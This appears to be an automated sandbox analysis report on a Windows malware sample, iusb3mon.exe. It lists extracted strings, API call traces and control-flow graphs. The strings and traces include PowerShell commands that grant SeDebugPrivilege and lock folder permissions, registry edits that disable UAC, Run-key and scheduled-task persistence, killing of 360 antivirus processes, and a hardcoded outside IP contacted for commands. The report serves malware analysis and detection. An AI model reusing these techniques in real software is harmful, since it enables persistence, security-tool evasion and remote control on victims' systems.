                                                                                                                    • powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 062468AE
                                                                                                                    • iiiiiiiiiiiiiiii.exe, xrefs: 0624698C
                                                                                                                    • C:\ProgramData, xrefs: 06246853
                                                                                                                    • C:\inst.ini, xrefs: 06246805
                                                                                                                    • C:\tzfz, xrefs: 062467F0
                                                                                                                    • C:\ProgramData\Program, xrefs: 06246848, 06246B86
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06246C16
                                                                                                                    • c:\inst.ini, xrefs: 06246967, 062469A3
                                                                                                                    • C:\Windows\svchost.exe, xrefs: 06246D23, 06246D27
                                                                                                                    • powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 062468A6
                                                                                                                    • C:\1.ini, xrefs: 062467F7
                                                                                                                    • C:\del, xrefs: 062467E9
                                                                                                                    • C:\ProgramData\Program\iusb3mon.exe, xrefs: 06246832
                                                                                                                    • iiiiiiiiiiiii.exe, xrefs: 062469C8
                                                                                                                    • C:\odbc.inst.ini, xrefs: 06246813
                                                                                                                    • C:\ProgramData\Data\upx.exe, xrefs: 0624685E
                                                                                                                    • C:\ProgramData\Data\upx.rar, xrefs: 06246874
                                                                                                                    • C:\ProgramData\Microsoft\Program, xrefs: 0624683D
                                                                                                                    • C:\2.ini, xrefs: 062467FE
                                                                                                                    • Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop, xrefs: 06246D3A
                                                                                                                    • 360Tray.exe, xrefs: 06246890, 06246957
                                                                                                                    • C:\ProgramData\Microsoft\Program\ziliao.jpg, xrefs: 06246824
                                                                                                                    • http://%s/ip.txt, xrefs: 06246AB7
                                                                                                                    • 360tray.exe, xrefs: 06246881, 06246993
                                                                                                                    • C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log, xrefs: 0624681A
                                                                                                                    • powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 062468B6
                                                                                                                    • C:\un.exe, xrefs: 06246869
                                                                                                                    • Mozilla/4.0 (compatible), xrefs: 06246A9A
                                                                                                                    • 202.79.169.178, xrefs: 062469F8, 06246A38, 06246AB0, 06246B17, 06246B2A
                                                                                                                    • C:\odbc.ini, xrefs: 0624680C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Thread$Create$Delete$Internet$Close$ExecHandleModuleNameOpenSleep$CopyProcess32$AttributesCtrlCurrentDispatcherExecutionExitFirstNextProcessReadServiceSnapshotStartStartupStateToolhelp32Valueconnecthtonsinet_addrsocket
                                                                                                                    • String ID: 202.79.169.178$360Tray.exe$360tray.exe$C:\1.ini$C:\2.ini$C:\ProgramData$C:\ProgramData\Data\upx.exe$C:\ProgramData\Data\upx.rar$C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log$C:\ProgramData\Microsoft\Program$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Program$C:\ProgramData\Program\iusb3mon.exe$C:\Windows\svchost.exe$C:\del$C:\inst.ini$C:\odbc.ini$C:\odbc.inst.ini$C:\tzfz$C:\un.exe$Cdefgh Jklmnopq Stuvwxya Cdef$Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop$Mozilla/4.0 (compatible)$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$c:\inst.ini$http://%s/ip.txt$iiiiiiiiiiiii.exe$iiiiiiiiiiiiiiii.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
                                                                                                                    • API String ID: 1792369710-2203574426
                                                                                                                    • Opcode ID: aa1aa8fed73566867cebfffa9ccaa7a89ab4ed2632a76d6185dbbd272f40b18b
                                                                                                                    • Instruction ID: 00c45304bfc8936a9fc820322d5d36e67666b513ef1e632cb59c168059211fd6
                                                                                                                    • Opcode Fuzzy Hash: aa1aa8fed73566867cebfffa9ccaa7a89ab4ed2632a76d6185dbbd272f40b18b
                                                                                                                    • Instruction Fuzzy Hash: DFE1B5B1A6034DBEEB94BBA1ACC9EAF7E6DDF05758F004456F944B1081C6B18E84CB71
                                                                                                                    Function 001D2170 Relevance: 79.3, APIs: 35, Strings: 10, Instructions: 549sleepcomwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 124 1d2170-1d21b4 Sleep CoInitializeEx 125 1d21b6-1d21ce call 1d2b20 call 1d2de0 124->125 126 1d21d3-1d21f4 CoCreateInstance 124->126 140 1d27ab-1d27c5 call 1d5b55 125->140 128 1d2219-1d22ce VariantInit * 4 VariantClear * 4 126->128 129 1d21f6-1d2214 call 1d2b20 call 1d2de0 CoUninitialize 126->129 137 1d22d0-1d22e0 call 1d2b20 call 1d2de0 128->137 138 1d22e3-1d2392 VariantInit * 4 VariantClear * 4 128->138 129->140 137->138 147 1d2394-1d23bb call 1d2b20 call 1d2de0 CoUninitialize 138->147 148 1d23c0-1d23df call 1d2060 138->148 147->140 154 1d23e5 148->154 155 1d23e1-1d23e3 148->155 157 1d23e7-1d2407 154->157 155->157 161 1d244f-1d2451 157->161 162 1d2409-1d2411 157->162 163 1d247f-1d2497 161->163 164 1d2453-1d247a call 1d2b20 call 1d2de0 CoUninitialize 161->164 162->161 165 1d2413-1d2415 162->165 175 1d24ce-1d24e4 163->175 176 1d2499-1d24c9 call 1d2b20 call 1d2de0 CoUninitialize 163->176 164->140 165->161 167 1d2417-1d241b 165->167 169 1d241d-1d2424 SysFreeString 167->169 170 1d242a-1d242f 167->170 169->170 173 1d2441-1d244c call 1d5b98 170->173 174 1d2431-1d243a call 1d5b63 170->174 173->161 174->173 186 1d24fd-1d2513 175->186 187 1d24e6-1d24f8 175->187 176->140 193 1d253d-1d2553 186->193 194 1d2515-1d2538 186->194 187->186 198 1d261d-1d263d SysAllocString 193->198 199 1d2559-1d259f call 1d2060 193->199 194->193 201 1d27c6-1d27f9 call 1d5860 MessageBoxA 198->201 202 1d2643-1d2696 VariantInit * 2 call 1d2060 198->202 215 1d25a5 199->215 216 1d25a1-1d25a3 199->216 208 1d269c 202->208 209 1d2698-1d269a 202->209 211 1d269e-1d26dc 208->211 209->211 214 1d26e0-1d26e8 211->214 218 1d26ea-1d26f0 214->218 219 1d2732-1d2755 VariantClear * 3 214->219 217 1d25a7-1d25bd 215->217 216->217 230 1d25bf-1d25c7 217->230 231 1d2602-1d2618 217->231 222 1d272b 218->222 223 1d26f2-1d26f4 218->223 220 1d2775-1d2785 call 1d2b20 call 1d2de0 219->220 221 1d2757-1d2773 call 1d2b20 call 1d2de0 219->221 248 1d2788-1d27a9 CoUninitialize 220->248 221->248 222->219 223->222 224 1d26f6-1d26fa 223->224 228 1d26fc-1d2703 SysFreeString 224->228 229 1d2709-1d270e 224->229 228->229 234 1d2720-1d2728 call 1d5b98 229->234 235 1d2710-1d2719 call 1d5b63 229->235 230->231 236 1d25c9-1d25cb 230->236 231->198 234->222 235->234 236->231 241 1d25cd-1d25d1 236->241 246 1d25e0-1d25e5 241->246 247 1d25d3-1d25da SysFreeString 241->247 252 1d25f7-1d25ff call 1d5b98 246->252 253 1d25e7-1d25f0 call 1d5b63 246->253 247->246 248->140 252->231 253->252
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00002710,5EE195CD), ref: 001D21A2
                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 001D21AC
                                                                                                                    • CoCreateInstance.COMBASE(001EF104,00000000,00000001,001EF0F4,?), ref: 001D21EC
                                                                                                                    • CoUninitialize.COMBASE ref: 001D2209
                                                                                                                      • Part of subcall function 001D2DE0: std::_Lockit::_Lockit.LIBCPMT ref: 001D2E36
                                                                                                                      • Part of subcall function 001D2DE0: std::_Lockit::_Lockit.LIBCPMT ref: 001D2E58
                                                                                                                      • Part of subcall function 001D2DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 001D2E78
                                                                                                                      • Part of subcall function 001D2DE0: std::_Facet_Register.LIBCPMT ref: 001D2EE5
                                                                                                                      • Part of subcall function 001D2DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 001D2F01
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D27CB
                                                                                                                    • MessageBoxA.USER32(00000000,001F89C0,001F89B8,00001010), ref: 001D27F1
                                                                                                                    Strings
                                                                                                                    • Failed to register task., xrefs: 001D2775
                                                                                                                    • Task registered successfully., xrefs: 001D2757
                                                                                                                    • Failed to create Task Service inst ance., xrefs: 001D21F6
                                                                                                                    • User Name, xrefs: 001D24E9
                                                                                                                    • Failed to create task definition., xrefs: 001D2499
                                                                                                                    • Failed to connect to Task Service., xrefs: 001D22D0, 001D2394
                                                                                                                    • C:\ProgramData\program\iusb3mon.exe, xrefs: 001D2587
                                                                                                                    • UserLoginStartupTask, xrefs: 001D267D
                                                                                                                    • Failed to initialize COM library., xrefs: 001D21B6
                                                                                                                    • Failed to get root folder., xrefs: 001D2453
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$CreateFacet_InitializeInstanceMessageRegisterSleepUninitialize_com_issue_error
                                                                                                                    • String ID: C:\ProgramData\program\iusb3mon.exe$Failed to connect to Task Service.$Failed to create Task Service inst ance.$Failed to create task definition.$Failed to get root folder.$Failed to initialize COM library.$Failed to register task.$Task registered successfully.$User Name$UserLoginStartupTask
                                                                                                                    • API String ID: 1252467509-2564446508
                                                                                                                    • Opcode ID: 539149bf83d13dc1705b2ab51cf02a435a557958a98cd1da3adc777652a3a51e
                                                                                                                    • Instruction ID: 096f7c73bacecdb8a618dff3fa077e232d36315b9b307a8a5cc7329cac5c4ee0
                                                                                                                    • Opcode Fuzzy Hash: 539149bf83d13dc1705b2ab51cf02a435a557958a98cd1da3adc777652a3a51e
                                                                                                                    • Instruction Fuzzy Hash: 16226E70E00609DFDB10DFA8CD45BAEB7B8EF69304F108159E959FB251EB30A985CB61
                                                                                                                    Function 06241B6D Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60registrysleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 06241B7A
                                                                                                                      • Part of subcall function 06241B34: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,06241B85), ref: 06241B47
                                                                                                                      • Part of subcall function 06241B34: GetProcAddress.KERNEL32(00000000), ref: 06241B4E
                                                                                                                      • Part of subcall function 06241B34: GetCurrentProcess.KERNEL32(00000000,?,?,?,06241B85), ref: 06241B5E
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,-00000200,?), ref: 06241BAD
                                                                                                                    • RegSetValueExA.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004), ref: 06241BCB
                                                                                                                    • RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004), ref: 06241BDC
                                                                                                                    • RegSetValueExA.ADVAPI32(?,PromptOnSecureDesktop,00000000,00000004,?,00000004), ref: 06241BED
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06241BF2
                                                                                                                    Strings
                                                                                                                    • EnableLUA, xrefs: 06241BD4
                                                                                                                    • PromptOnSecureDesktop, xrefs: 06241BE5
                                                                                                                    • ConsentPromptBehaviorAdmin, xrefs: 06241BC3
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 06241BA0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$AddressCloseCurrentHandleModuleOpenProcProcessSleep
                                                                                                                    • String ID: ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                    • API String ID: 3477048420-3549642244
                                                                                                                    • Opcode ID: bb6cf85eb6b2109891dbf5d6f7cafecf734f84e5c0948bfe749b1630aea15129
                                                                                                                    • Instruction ID: bedf9604d7ff02df2162cf95fcfe66fd5450346670fd2c7b93d670070724d0ed
                                                                                                                    • Opcode Fuzzy Hash: bb6cf85eb6b2109891dbf5d6f7cafecf734f84e5c0948bfe749b1630aea15129
                                                                                                                    • Instruction Fuzzy Hash: EB0140B156024CBEE751ABA2EC8ADEF7F7CEB81754F10006AB601E1050DA705F54DB70
                                                                                                                    Function 06245CE6 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 494 6245ce6-6245d16 CreateToolhelp32Snapshot Process32First 495 6245d57-6245d5a 494->495 496 6245d18-6245d31 Process32Next 494->496 497 6245d33-6245d46 call 624a210 496->497 498 6245d4e-6245d55 CloseHandle 496->498 497->496 501 6245d48 497->501 498->495 501->498
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06245CF6
                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 06245D0F
                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 06245D2A
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06245D4F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 420147892-0
                                                                                                                    • Opcode ID: 73141b703bbb3f6f51f3f4201e6935f0cc765830ded2fde3c62102d71c20f999
                                                                                                                    • Instruction ID: 3a438586a4023560988cef5e7a40500d2e6b3e9e9681dac58cb4215cd3744596
                                                                                                                    • Opcode Fuzzy Hash: 73141b703bbb3f6f51f3f4201e6935f0cc765830ded2fde3c62102d71c20f999
                                                                                                                    • Instruction Fuzzy Hash: 8FF096715112196BEBE1BAA5DC85EEAB7FCEF48354F1000A9ED44E2140DF74C9958A21
                                                                                                                    Function 06245E1F Relevance: 68.6, APIs: 32, Strings: 7, Instructions: 330registrysleepprocessCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 261 6245e1f-6245e36 262 6245e3b-6245e48 call 6245ce6 261->262 265 6245f21-6245f2e call 6245ce6 262->265 266 6245e4e-6245e67 RegOpenKeyExA 262->266 275 6245f34-6245f4d RegOpenKeyExA 265->275 276 6245fe1-6245ffa RegOpenKeyExA 265->276 267 6245e8c-6245eb1 call 6245da7 Sleep FindWindowA 266->267 268 6245e69-6245e87 call 6247b7d call 6247109 266->268 280 6245ed6-6245ef0 call 6247b7d call 6247109 267->280 281 6245eb3-6245ed1 call 6247b7d call 6247109 267->281 294 6245fb4-6245fb9 call 6255967 268->294 282 6245f6f-6245f94 call 6245da7 Sleep FindWindowA 275->282 283 6245f4f-6245f6d call 6247b7d call 6247109 275->283 277 6246024-6246049 call 6245da7 Sleep FindWindowA 276->277 278 6245ffc-6246016 call 6247b7d call 6247109 276->278 305 624606b-62460ab call 6247b7d call 6247109 call 6255967 call 6247ac4 Sleep WinExec 277->305 306 624604b-6246069 call 6247b7d call 6247109 277->306 320 624601a-624601f call 6255967 278->320 317 6245ef4-6245f1c call 6255967 call 6247ac4 Sleep WinExec 280->317 281->294 300 6245f96-6245fb0 call 6247b7d call 6247109 282->300 301 6245fbe-6245fdc call 6247b7d call 6247109 282->301 283->294 321 624627e-6246289 Sleep 294->321 300->294 301->317 337 62460b1-62460c0 call 6241f38 305->337 306->320 317->321 320->337 321->262 342 62460c5-62460ca 337->342 342->321 344 62460d0-62460f5 call 6245da7 Sleep FindWindowA 342->344 347 62460f7-6246115 call 6247b7d call 6247109 344->347 348 624611a-6246278 call 6247b7d call 6247109 call 6255967 RegOpenKeyExA GetModuleFileNameA call 624a2d0 RegSetValueExA RegCloseKey RegOpenKeyExA GetModuleFileNameA call 624a2d0 RegSetValueExA RegCloseKey RegOpenKeyExA GetModuleFileNameA call 624a2d0 RegSetValueExA RegCloseKey RegOpenKeyExA GetModuleFileNameA call 624a2d0 RegSetValueExA RegCloseKey 344->348 347->294 348->321
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06245CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06245CF6
                                                                                                                      • Part of subcall function 06245CE6: Process32First.KERNEL32(00000000,?), ref: 06245D0F
                                                                                                                      • Part of subcall function 06245CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06245D2A
                                                                                                                      • Part of subcall function 06245CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06245D4F
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0626D344,00000000,00020119,?), ref: 06245E63
                                                                                                                    • Sleep.KERNEL32(Q360SafeMonClass), ref: 06245E9D
                                                                                                                    • FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06245EA9
                                                                                                                    • Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06245F0A
                                                                                                                    • WinExec.KERNEL32(0626D22C,00000000), ref: 06245F16
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0626D344,00000000,00020119,?), ref: 06245F49
                                                                                                                    • Sleep.KERNEL32(Q360SafeMonClass), ref: 06245F80
                                                                                                                    • FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06245F8C
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0626D344,00000000,00020119,?), ref: 06245FF6
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 06246283
                                                                                                                      • Part of subcall function 06245DA7: FindWindowA.USER32(?,00000000), ref: 06245DB1
                                                                                                                      • Part of subcall function 06245DA7: PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06245DE5
                                                                                                                      • Part of subcall function 06245DA7: SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06245DF0
                                                                                                                    • Sleep.KERNEL32(Q360SafeMonClass), ref: 06246035
                                                                                                                    • FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06246041
                                                                                                                    • Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 0624609F
                                                                                                                    • WinExec.KERNEL32(0626D22C,00000000), ref: 062460AB
                                                                                                                    • Sleep.KERNEL32(Q360SafeMonClass), ref: 062460E1
                                                                                                                    • FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 062460ED
                                                                                                                      • Part of subcall function 06247B7D: __EH_prolog.LIBCMT ref: 06247B82
                                                                                                                      • Part of subcall function 06247109: __EH_prolog.LIBCMT ref: 0624710E
                                                                                                                      • Part of subcall function 06247AC4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,06278518,06246098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06247ADA
                                                                                                                      • Part of subcall function 06247AC4: WriteFile.KERNEL32(00000000,06268760,00000EE2,?,00000000), ref: 06247AF2
                                                                                                                      • Part of subcall function 06247AC4: CloseHandle.KERNEL32(00000000), ref: 06247AFF
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?,0000000A), ref: 06246152
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0624615F
                                                                                                                    • RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 0624617B
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06246185
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 062461A0
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 062461B0
                                                                                                                    • RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 062461CC
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 062461D6
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?), ref: 062461F1
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06246201
                                                                                                                    • RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 0624621D
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06246227
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 06246242
